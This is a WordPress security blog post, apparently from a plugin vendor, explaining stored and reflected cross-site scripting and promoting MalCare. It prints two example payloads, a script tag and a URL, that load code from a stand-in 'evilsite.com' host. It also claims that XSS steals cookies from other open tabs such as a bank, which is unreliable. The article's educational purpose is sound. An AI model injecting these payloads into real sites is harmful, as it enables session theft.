WordPress XSS Vulnerability: How To Prevent It?

Feb 22, 2020

WordPress XSS Vulnerability: How To Prevent It?

Feb 22, 2020

Did you know that cross site scripting (XSS) is one of the most dangerous attacks that can be launched at your WordPress site? Are you aware of the devastating consequences of this hack?

In an XSS attack, hackers inject malicious scripts to steal information, deface your site, and modify content. They inject spam links and use your website to target visitors and mislead them into willingly revealing their personal data. They also steal sensitive data from your WordPress site.

The situation can snowball quickly where not only you stand the chance of being blacklisted by Google but also suspended by your web host. All of this shatters your reputation and relationship with visitors and clients.

Luckily, there are ways to protect your website and your business from XSS attacks. In this article, we will take you through the step-by-step process to prevent Cross-site Scripting on your WordPress site.


Protect your WordPress website against XSS attacks by activating our MalCare Security Solution. The WordPress plugin will monitor and scan your site regularly, and also proactively block hack attempts.

What is XSS (Cross-Site Scripting) Vulnerability in WordPress?

Cross-Site Scripting is a type of hack attack made on WordPress websites. This type of attack is carried out in 2 ways:

  1. By exploiting user input
  2. By bypassing same-origin policies

Let’s explain.

Exploiting User Inputs

Every WordPress website has user input fields site search, comment form, contact form, login pages, etc. All these input fields are enabled by a plugin or the theme which is active on your website.

The information users enter here gets relayed to your website’s database for processing and storage. Ideally, these input areas should have website security measures in place to validate what kind of data is entered by users. 

search bar example

Example of a site search bar


Working in the realm of WordPress security for close to a decade, we’ve seen plugins and themes developing vulnerabilities from time to time.

In Cross-site scripting attacks, hackers utilize WordPress vulnerabilities in input fields to insert malicious codes into the website. For instance, a site search bar should accept only plain text including letters and numerals. When there are no checks, hackers take advantage of it and enter malicious scripts.

A malicious code might look like:

<script src=”http://evilsite.com/badscript.js”></script>

These scripts are sent to the database. Instead of it being plain text data, it’s an executable code that hackers can use to run malicious activity.

Next, we need to understand how hackers use the injected code.

Bypassing Same Origin Policies

In the digital world, there is a security measure called the Same Origin Policy (SOP). It forbids one web page to retrieve information from other web pages. This means if you have your Facebook and PayPal accounts opened on the same browser, the Facebook tab cannot access, read or modify content of the PayPal tab. This ensures there are no cross-site requests made.

Despite the measures taken to ensure that there one tab cannot read information from the next tab, hackers have found a way around it using session cookies.

When you log into a website, your browser (Google Chrome, Firefox, Safari, etc) generates a session cookie. This validates you as a user of that website and enables you to move from one page to another seamlessly.

For example, when you sign into Facebook, a session cookie is generated. If a session cookie didn’t exist, you would have to log into Facebook every time you wanted to switch pages such as from your profile to another person’s profile.

Besides login credentials, cookies store all sorts of information such as credit card information, shopping preferences, and personal data.

How Hackers Steal Cookies?

If there’s a vulnerability in the user’s browser, hackers use the code they injected into the website in the previous step to steal session cookies. A hacker would be able to steal cookies of other tabs as well that are open on the browser.

To explain what happens next, let’s take an example.

    • Let’s assume there’s a website called Blog.com. It uses a plugin to enable comments on its posts. But the plugin has an XSS bug due to which a hacker is able to comment with a malicious script.
    • Next, you login Blog.com and at the same time you have another site open on your browser called Bank.com.
    • When you log in to these websites, your browser creates a session cookie for each site.
    • When you visit Blog.com, everything seems normal to you. What you don’t know is that by viewing or clicking on the infected comment, it would’ve executed a command. The code executed would steal the browser cookies from both Blog.com and Bank.com.
    • Now by using the cookies, they can impersonate you on Bank.com. Bank.com is under the impression that the hacker is you. Next, they steal your bank details and your funds!

In a WordPress XSS attack, both the website owner and the visitor are victims. Hackers carry out two main types of cross-scripting WordPress attacks which we’ll discuss next.


Types of XSS Attacks on WordPress Sites

There are primarily two types of XSS Attacks which you need to learn about:

    • Stored Or Persistent XSS Attack – The target of this attack is the visitor of your website. They defraud customers, steal their private information and their funds.
    • Reflective Or Non-Persistent XSS Attack – The target is your WordPress website.

We’ll explain both in detail.

Stored Or Persistent XSS Attack

Let’s assume your website is a blog that allows people to comment on articles you publish. When a visitor leaves a comment, the data is sent to the database and stored.

Your site should have configurations to sanitize the data before it’s sent to the database. This means it should check whether what the user entered is a regular comment or if it’s a malicious script. If these checks aren’t in place, it opens up a WordPress XSS flaw. Let’s see how:

Step 1: Hacker Finds The Vulnerability And Exploits It

Hackers use automated scanners to run through the internet and find website’s that have an XSS vulnerability. Once they find your site, they enter malicious scripts into your comments section. Since your website has no checks in place, it accepts the script and sends it to the database.

Step 2: A Visitor Views The Infected Page

To a visitor, the hacker’s input would look like a regular comment. What the visitor and the website owner don’t know is that this comment is an executable code that is designed to steal cookies. Anyone who simply visits this page will be impacted.

Step 3: The Hacker Steals Browser Cookies

We know regular users usually have multiple tabs open on a browser such as email, Facebook, a shopping site like Amazon, a work website, YouTube, etc. 

tabs on chrome 

When they visit your website and view the page with the hacker’s comment, the code is executed. This enables the hacker to steal their browser cookies. This attack is called ‘cross-site’ because they are able to steal cookies of all sites open on different tabs.

Step 4: The Hacker Exploits The Stolen Cookies

Next, using these cookies, they can pose as authenticated users on the shopping site and make purchases. They can steal sensitive account information such as usernames and passwords. They can hack into your email and send phishing or defrauding mails to your contacts. The list is endless.

This kind of attack jeopardizes anyone who visits your website. In the next type of XSS attack, it targets the website directly.

Reflective Or Non-Persistent XSS Attack

In the previous attack, we saw how hackers target visitors. But in this attack, hackers infect the website itself. As we mentioned earlier, most internet users have multiple tabs open on their browsers. The same applies to website owners as well. Many times, your WordPress admin user dashboard is just one of the tabs open on your browser. This makes a reflective XSS attack possible.

We’ll illustrate how this happens:

Step 1: Getting the Site Owner to Click on a Malicious Link

Quite often, hackers send malicious links through emails hoping someone falls for their trick. In other cases, hackers place these malicious links on other WordPress sites.

When you click on the link, it causes a script to load on your website from an external website. This link contains a code like this:

https://yoursite.com/test.php?val=<script src=”http://evilsite.com/badscript.js”></script>

Step 2: Grab Session Cookies

By clicking on the link, you execute the code. This enables hackers to steal your cookies and pose as a user signed into your administrator account of your WordPress site. Once they gain access to your site, they could steal login credentials and sensitive data, lock you out of your own website, and use it to run different kinds of hacks.

XSS attacks carry severe consequences and damage to your website and business. Recovering from such an attack consumes a lot of time and money. You can avoid being a victim of XSS by taking precautions against it.


How to Protect Your WordPress Website From XSS Attacks

There are several ways to protect your website against stored XSS attacks. You can attempt to add codes to your site to validate and sanitize data that’s being sent to your database via user inputs. But such steps require technical expertise. If you aren’t familiar with the inner workings of WordPress, you’d be better off hiring a professional to implement these measures for you.

Here, we’ve listed security measures you can take on your own to prevent Cross-Site Scripting on your website:

Install a Security Plugin – MalCare

The first and most important step to prevent XSS on your site is to get a security solution. We recommend installing MalCare because it takes care of all your security needs:

    • It puts up a strong firewall to block any traffic that is known to be malicious.
    • You can implement WordPress hardening measures on your website easily to make your website secure against XSS attacks.
    • It runs a deep scan of your website for malware.
    • You can manage all updates on your WordPress site from the independent dashboard.
    • It backs up your WordPress site so in case of a hack, you can restore your site to normal quickly.

With MalCare installed, you’ve taken a giant step towards making your website more secure.

Install Anti-XSS Plugin – Prevent XSS Vulnerability Plugin

To implement measures specific to XSS attacks, you can use the Prevent XSS Vulnerability Plugin. It will block parameters that are commonly used in XSS attacks. 

prevent wordpress xss vulnerability plugin 

It will secure user input areas such as your site search and comments section. To check if this plugin is compatible with your site, we recommend using a staging site to test this plugin. You can set up a staging site with MalCare from its dashboard. 

create staging site for wordpress xss 

Here, you can make changes and test new things without it affecting your live site. Once you’re happy the plugin is compatible, you can install and activate it on your live site.

The plugin is straightforward and will prevent WordPress XSS vulnerabilities on your site.


Final Thoughts

In the WordPress realm, XSS vulnerabilities show up quite often. Victims of these attacks experience devastating consequences, some of which are hard to recover from.

Before we conclude this article, we’d like to leave you with a few general security tips:

    • Always keep a WordPress security plugin active on your site. Hackers like easy targets, they aren’t biased between big or small WordPress sites. If you have basic security measures in place, hackers will make a few unsuccessful attempts and move on to the next target.
    • Keep your WordPress website updated. Many hacks are caused due to outdated software such as themes and plugins. When developers find security flaws in their software, they fix it and release a security updates. Once you update your site to the new version, the security flaw is fixed. The same applies to the WordPress core installation. WordPress developers carry out threat research to fix security flaws. Make sure you always use the latest WordPress version.
    • Use an SSL certificate to make sure the data transmitted from and to your website is always encrypted.
    • Take a backup of your website regularly. If your website is attacked, it takes time to figure out where the attack originated and how to fix it. In the meanwhile, you can restore your backup to get your site back to normal. If you’re a client of MalCare, backups are taken automatically.

With these measures in place, we’re sure your WordPress site is secure. Preventing XSS attacks can save you a world of trouble. Stay safe!

Protect Your WordPress Website With

wordpress xss
Share via
Copy link